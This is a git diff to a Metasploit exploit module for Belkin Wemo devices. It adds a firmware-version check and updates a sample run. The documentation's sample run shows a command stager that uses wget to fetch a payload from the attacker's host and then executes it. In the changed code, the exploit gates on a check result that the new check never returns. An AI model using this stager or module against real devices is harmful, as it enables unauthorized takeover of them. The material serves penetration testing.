diff --git a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md
index ac13bc43ea..5ef1f46359 100644
--- a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md
+++ b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md
@@ -32,7 +32,9 @@ for Crock-Pot and 49153 for other devices.
 msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run
 
 [*] Started reverse TCP handler on 10.22.22.4:4444
-[+] Wemo-enabled device detected
+[*] Wemo-enabled device detected
+[*] Found firmware version: 2.00.6461
+[*] 10.22.22.1:49152 - The target appears to be vulnerable.
 [*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
 [*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6
 [*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]
diff --git a/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb b/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
index 587324c127..71af943c01 100644
--- a/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
+++ b/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author'             => [
         'phikshun', # Discovery, UFuzz, and modules
-        'wvu'       # Crock-Pot testing and module
+        'wvu',      # Crock-Pot testing and module
+        'nstarke'   # Version-checking research and implementation
       ],
       'References'         => [
         ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
@@ -61,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Stability'        => [CRASH_SAFE],
         'SideEffects'      => [ARTIFACTS_ON_DISK],
         'Reliablity'       => [REPEATABLE_SESSION],
-        'NOCVE'            => 'Patched in 2.00.8643' # TODO: Add firmware check
+        'NOCVE'            => 'Patched in 2.00.8643'
       }
     ))
 
@@ -76,23 +77,45 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    checkcode = CheckCode::Unknown
+
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => '/setup.xml'
     )
 
-    if res && res.code == 200 && res.body.include?('urn:Belkin:device:')
-      vprint_good('Wemo-enabled device detected')
-      return CheckCode::Appears
+    unless res && res.code == 200 && res.body.include?('urn:Belkin:device:')
+      vprint_error('Wemo-enabled device not detected')
+      return checkcode
     end
 
-    CheckCode::Safe
+    vprint_status('Wemo-enabled device detected')
+    checkcode = CheckCode::Detected
+
+    version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&
+              v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && $1 && Gem::Version.new($1)
+
+    unless version
+      vprint_error('Could not determine firmware version')
+      return checkcode
+    end
+
+    vprint_status("Found firmware version: #{version}")
+
+    # https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
+    if version < Gem::Version.new('2.00.8643')
+      checkcode = CheckCode::Appears
+    else
+      checkcode = CheckCode::Safe
+    end
+
+    checkcode
   end
 
   def exploit
     checkcode = check
 
-    unless checkcode == CheckCode::Appears || datastore['ForceExploit']
+    unless checkcode == CheckCode::Vulnerable || datastore['ForceExploit']
       fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
     end